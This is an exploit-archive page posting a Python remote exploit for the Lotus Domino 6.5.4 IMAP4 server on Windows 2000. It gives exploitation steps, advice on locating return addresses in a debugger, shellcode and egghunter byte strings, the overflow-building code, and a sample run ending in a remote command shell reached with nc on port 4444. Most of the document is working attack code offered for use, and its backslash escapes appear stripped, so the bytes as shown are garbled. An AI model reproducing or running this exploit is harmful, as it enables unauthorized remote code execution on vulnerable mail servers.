Home / os / blackberry
lotus-overflow.txt
Posted on 23 July 2007
########################################################################################### # Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit ########################################################################################### # Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4) # Authors: Dominic Chell <dmc@digitalapocalypse.net> & prdelka # # Exploitation steps: # 1) The instruction "call dword [ecx]" is performed with user supplied ECX # 2) EAX reference our buffer from retaddr onward # 3) we put pointer in ECX to a pointer referencing "call eax" # 4) a small payload decrements eax and then jmp's into the eax buffer due # to size limitations. # 5) our larger payload is then executed. # # muts exploit would not work for us, his egghunt uses 0x2e which is converted # to 0x09 (.'s to [tab]'s) and his return address was not found on our test # environment. # # Finding a Target: # To find a target, attach a debugger to nimap.exe, cause the application # to crash. Then use search function to find "call eax" or equivilant # instruction in memory. Then, take the pointer to eax, such as "0x77ff1122" # and search for another location in memory that has "0x11 0xff 0x77". This # will be utilised for a return address if no instruction modify eax or # subvert execution to another place in memory. # # Thanks to: nemo, hdm, jf, Winny Thomas, muts # ########################################################################################### # Note: it takes a few minutes for the egghunter to find the payload in memory # # For example: # C:workexploitsimap>poc.py # [*] sending payload # [*] sending payload # [*] sending payload # [*] sending payload # * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100 # # PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4= # # sending... # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ # kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3 # BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421 # M2iR5FFG # # # C:workexploitsimap>nc -vv 192.168.126.130 4444 # 2KVM-DC [192.168.126.130] 4444 (?) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-1999 Microsoft Corp. # # E:LotusDomino> # ########################################################################################### import socket, struct, md5, base64, sys, string, signal, getopt class Exp_Lotus: def __init__(self): self.host='127.0.0.1' self.port=143 def send_payload(host,port): payload ="x54x30x30x57x54x30x30x57" payload += ("x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7" "x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f" "x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b" "xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19" "x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8" "x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b" "xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b" "xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0" "x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50" "x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82" "xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3" "xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61" "x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8" "x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9" "xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7" "x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0" "xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad" "x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f" "x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1" "x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50" "x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf" "xa4x7dx2ex7fx27x82xf8x80") try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) d=s.recv(1024) print "[*] sending payload" s.send('a001 admin ' + payload + ' ') d=s.recv(1024) s.close() except: "Can't connect to IMAP server" def usage(): print sys.argv[0] + " Lotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit author: dmc@digitalapocalypse.net & prdelka" print " -h host" print " -p port" sys.exit(2) def signal_handler(signal, frame): print 'err: caught sigint, exiting' sys.exit(0) def exp(host, port): buffer = "x90" * 193 buffer += ("xdbxd2xd9x74x24xf4x58x29xc9xb1x0axbbx71x35x21" "xfex31x58x17x03x58x17x83x99xc9xc3x0bx6axe0x62" "x75x46xfbx64x37x04x6ex79xefx65x40x41x0ax2fxe9" "x56xacx9bx21x99x9axa8xb8x76x51x44x93xfcx7dx67" "x0bxf4x81") try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) d=s.recv(1024) print d s.send('a001 authenticate cram-md5 ') d=s.recv(1024) d=d[2:1022].strip() print d m=md5.new() m.update(d) digest = m.digest() buffer += struct.pack('<L', 0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68) buffer += "x90x90x90x83xE8x52x83xE8x52x83xE8x52xFFxE0" buffer = buffer + ' ' + digest s.send(base64.encodestring(buffer) + ' ') print " sending... ", base64.encodestring(buffer) , ' ' except: "Can't connect to IMAP server" def main(argv=None): if argv is None: argv = sys.argv[1:] if not argv: usage() try: opts, args = getopt.getopt(argv, 'h:p:') except getopt.GetoptError: usage() signal.signal(signal.SIGINT, signal_handler) ex = Exp_Lotus() for o, a in opts: if o == '-h': ex.host=a.strip() elif o =='-p': ex.port = int(a) host = ex.host port = ex.port send_payload(host,port) send_payload(host,port) send_payload(host,port) send_payload(host,port) exp(host, port) if __name__ == '__main__': main()